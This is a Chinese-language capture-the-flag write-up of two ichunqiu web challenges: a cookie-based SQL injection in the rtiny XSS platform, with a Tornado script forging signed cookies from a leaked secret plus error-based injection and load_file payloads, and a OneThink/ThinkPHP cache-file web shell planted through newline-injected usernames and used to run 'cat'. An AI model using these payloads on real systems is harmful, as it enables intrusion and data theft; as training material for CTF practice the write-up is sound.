由于校赛马上就要开始了,自己最近也停止了钻研虚拟机跟渗透的过程,准备把ichunqiu上的web题再继续刷下去。于是遇到两道让我 收获颇丰的题目。
xss平台
这道题目算是很有意思的一道sql注入题。确切讲属于cookie加密注入。只不过要想发现漏洞并没有那么简单。
这里简单说一遍思路,首先当然是尝试登录了。只不过用户名与密码都一无所知。那么是不是有其他隐藏信息呢?扫描一遍目录没什么收获。暴力扫目录太耗时间。所以这里有一招利用报错获取信息的技巧。通过抓包将传参改为数组得到报错信息:
发现这里的login.py部署在/rtiny/下,感觉有蹊跷。于是谷歌rtiny。
在github上找到这个项目并说明是一个xss轮子。仔细看下源码不难发现我们所做的xss平台这个网站是基于python的tornado框架。进行源码审计(这里我偷懒了,看大佬们轻松发现sql注入漏洞。毕竟文件太多看不来hh)
贴下rtiny目录下其中lock.py的源码
#!/usr/bin/env python
# -*- coding:utf-8 -*-
__author__ = 'r0ker'
import tornado.web
from function import md5
import db
from config import URL
class LockHandler(tornado.web.RequestHandler):
def get(self):
self.set_secure_cookie("lock",'1')
self.render("lock.html")
def post(self):
username = self.get_secure_cookie("username") or ''
passwd = md5(self.get_argument('password', ''))
row = db.ct("manager", "*", "username='" + username + "' and password='" + passwd + "'")
if row:
self.set_secure_cookie("lock", "0")
self.redirect("http://" + URL)
else:
self.redirect("http://" + URL + "/lock")
这里不难发现username参数会用get_secure_cookie()函数从cookie中获取username,之后会利用username参数与passwd参数去进行数据库操作。这里我去db.py确认了下ct操作的功能
def ct(table, column, where):
return db.get("select "+column+" from "+table+" where "+where)
看来是可以注入了。但现在需要知道cookie的加密方法,这个加密密钥可以在index.py中找到。为:"cookie_secret": "M0ehO260Qm2dD/MQFYfczYpUbJoyrkp6qYoI2hRw2jc="
接下来要做的,就是利用这个现有轮子复现web服务,让我们的注入语句能够经过加密。
脚本如下。
# coding:utf-8
import tornado.ioloop
import tornado.web
settings = {
"cookie_secret" : "M0ehO260Qm2dD/MQFYfczYpUbJoyrkp6qYoI2hRw2jc=",
}
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.write("Hello")
#self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select version()))) -- ")
#self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select group_concat(distinct table_name) from information_schema.tables where table_schema=database())))-- ")
#self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name='manager')))-- ")
#self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,mid((select group_concat(username,'|',password,'|',email) from manager),29,60))) -- ")
#self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select load_file('/var/www/html/f13g_ls_here.txt'))))#")
self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,mid((select load_file('/var/www/html/f13g_ls_here.txt')),24,60)))#")
self.write(self.get_secure_cookie("username"))
def make_app():
return tornado.web.Application([
(r"/index", MainHandler),
], **settings)
if __name__ == "__main__":
app = make_app()
app.listen(8089)
tornado.ioloop.IOLoop.instance().start()
这样我们就可以在本地复现并加密了。这里sql注入选择报错注入或者普通的select都是可以的。(报错注入比较稳)本地打开localhost:8089/index后抓包把返回的cookie中username值copy下来。之后进入到/lock下提交(在cookie中加入username的值)
之后可由抓包信息拿到库名表名列名等。
不过这里爆出来的信息不能完全显示(username+passwd+email长度过长了),所以注入语句中可以看到使用了mid()函数,需要调整参数分开读数据,最终利用load_file()读取flag也是如此。
OneThink
苦苦坚持才做出的一题。昨天最后拿到flag后就发誓一定要写wp记录下自己的做题经历(菜鸡狂喜)。这里来写下详细过程:
首先登陆进去发现是OneThink框架。百度下搜到了OneThink存在的漏洞。还发现这个框架也是拿Thinkphp二次开发的,存在一个著名漏洞,就是缓存文件存储名是一个固定的。2bb202459c30a1628513f40ab22fa01a.php
去请求/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php也发现确实存在。
关于漏洞的简单利用之传一个phpinfo();上去
https://bbs.ichunqiu.com/thread-4918-1-1.html
可以看见我们也可以利用这个缓存文件漏洞getshell.但是首先注意,我们为了拿shell,必须确保语句正确传入缓存,也就是说我们必须以正确的用户名登录。那用户名有哪里不好传吗?当然,如果看完看上面那篇漏洞利用,就会发现我们的用户名必须是%0a+语句+//的格式,也就是说先换行,执行语句并注释掉后面的一个大括号。这里我们如果直接在注册界面用用户名注册,上传时仍会将我们的%0a进行url编码,这样实际上执行语句就不正确了。
于是开始下手。看到其他大佬都是burpsuite intercept进行改包,我也开始准备bp拦包发包。。。结果失败了???我百思不得其解,我的bp明明可以拦到http的post请求,结果却不能在intercept下抓到这个网页的post包?(测试了下其他网站都行,真的让人绝望)试图用repeater功能改包却发现因为验证码的存在是没用的。
就在这时我想起了自己刚入门时使用的抓包神器Fiddler。当初在用它时学到过其breakpoint的功能:
它可以在requests前或者response后进行暂停,也就是抓包了。只要有它一样可以上传。于是改用Fiddler抓包
第一步,传
%0a$a=$GET_[a];//
这里将被编码过的%0a直接删掉,改为Enter一个回车解决问题。然后正常发包,关掉breakpoint,确认注册成功。之后登陆这个账号,这里当然也要再度打开breakpoint,在登录时将%0a改为换行。确认正确登录即可。
第二步,传%0aecho `$a`;//
同样操作再来一遍。
确认登录成功后就可以利用shell了。在缓存文件利用参数a跟ls找到flag目录,之后cat即可
http://fa88cc1f11014c3485ba87c6ad3176483ba0157572714652.changame.ichunqiu.com/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ../../flag.php
总结下吧,这两天这两道题其实都花了不少时间,但是做的格外快乐,也非常有收获。比如第一题让我了解到程序员所谓的轮子指的是什么,了解到python的tornado框架(原来就知道Django),而且即使自己不完全理解框架的知识也能加以利用。第二题把一句话木马变体成两句话getshell,而且魔鬼般的发包改包也让我体会到web手的辛酸。ichunqiu下发的容器第一个1小时用完了才开始改用fiddler,之后按套路传应该传成功了却没有拿到shell。报复性传了个phpinfo()才确认自己在改包这个环节没有出错。于是绝望中重新下发容器再传一遍就成功了?!所以坚持一定有成果,相信自己做下去,一定不会让你失望。